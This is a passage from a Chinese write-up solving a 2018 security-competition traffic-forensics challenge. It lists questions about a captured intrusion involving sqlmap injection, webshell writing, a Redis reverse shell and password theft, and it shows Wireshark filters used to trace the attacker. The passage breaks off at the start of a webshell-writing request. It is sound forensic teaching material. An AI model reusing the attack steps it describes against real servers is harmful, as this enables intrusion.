2018.6.1信息安全铁人三项赛数据赛题解

本文原创作者：一叶飘零

原创投稿详情：重金悬赏 | 合天原创投稿等你

上篇文章介绍了5.18日比赛的题目解（2018.5.18信息安全铁人三项赛数据赛题解），今天接着介绍6.1日的比赛题解！

目录

前言 

题目描述 

题目解析（part1）

阶段性梳理 

题目解析（part2）

题目答案

后记

前言

本场比赛为2018铁三分区赛最后一场，下面是题目分享：

链接:

https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 

密码:v6wu

解压密码:t3sec.org.cn

题目描述

1.被攻击的两个服务器的内网ip分别是多少，以下简称服务器1和2(格式：空格分隔，按黑客攻击顺序排列）

2.两台服务器的主机名分别是什么

3.黑客使用了什么工具对服务器1进行的攻击(小写)

4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user/pass/vcode)

5.黑客向服务器1写入webshell的具体命令是什么(url解码后)

6.服务器1都开启了哪些允许外连的TCP注册端口(端口号从小到大，用空格间隔)

7.服务器1安装的修补程序名称

8.网站根目录的绝对路径(注意：大写，左斜杠，最后要有一个斜杠)

9.黑客使用什么命令或文件进行的内网扫描

10.扫描结果中服务器2开放了哪些端口(端口号从小到大，用空格隔开)

11.黑客执行的什么命令将administrator的密码保存到文件中

12.服务器1的系统管理员administrator的密码是什么

13.黑客进行内外扫描的ip范围(格式:xx.xx.xx.xx~xx.xx.xx.xx)

14.服务器1的mysql的root用户的密码是什么

15.黑客在服务器2中查看了哪个敏感文件(拿到shell之后)，请写出绝对路径

16.服务器2的web网站后台账号密码(格式:账号/密码)

17.黑客在redis未授权访问中反弹shell的ip和端口是多少

18.黑客拿到root权限后执行的第二条命令是什么

19.服务器2的root用户密码是什么

20.黑客向服务器2写入webshell的命令

21.pcap中哪些ip发送过无偿ARP包(空格分隔，时间顺序排序)

题目解析(part1)

首先拿到庞大的数据包，我们的第一选择肯定是找出攻击者，方便后续的大规模过滤筛选，而定位黑客的最直接的方式就是找到大量重复的探测流量，例如目录爆破、sql注入探测等

这里我们可以先过滤http流量，发现最瞩目的是202.1.1.2的sql探测

我们随便挑一个，可以清楚看到，是用sqlmap进行的注入探测，可以确定无误，202.1.1.2即黑客

而受害者为192.168.1.74

故此我们后续的过滤为

(ip.addr== 202.1.1.2 || ip.addr == 192.168.1.74) && http

在后续数据包(第五个数据包)里可以发现另一个被攻击的ip

过滤规则

ip.src== 192.168.1.74 && ip.dst !=202.1.1.2 && http

192.168.2.66

然后是主机名，对于主机名，我们知道，phpinfo是非常好的查看方式，不仅可以获取主机名，还可以知道根目录等有效信息，所以既然问了我们这个问题，我们不妨查看一下黑客是否查找了phpinfo()

使用指令

ip.addr== 192.168.1.74 && http contains "phpinfo"

可以发现第一个被攻击的主机的phpinfo流量

同理，在后续数据包查找第二台

ip.addr== 192.168.2.66 && http contains "phpinfo"

然后我们将phpinfo回显的html保存到本地方便查看

然后依次打开

第一台

第二台

于是我们的得到答案

TEST-7E28AF8836cloude

接下来一个问题就是送分题了，正是我们前面分析的

sqlmap

然后接下来题目问我们有关登录的信息，所以我们选择过滤黑客ip和post请求方式

ip.addr== 202.1.1.2 && http.request.method == "POST"

很容易看到我们需要的答案

admin/adminlwphp/WD7x

接下来问我们小马的写入方式，我们这里选择简单的过滤攻击者的http流量

ip.src== 202.1.1.2 && http

在第二个数据包中

即可看到命令执行，写入小马的payload

GET/tmpbjhbf.php?cmd=echo ^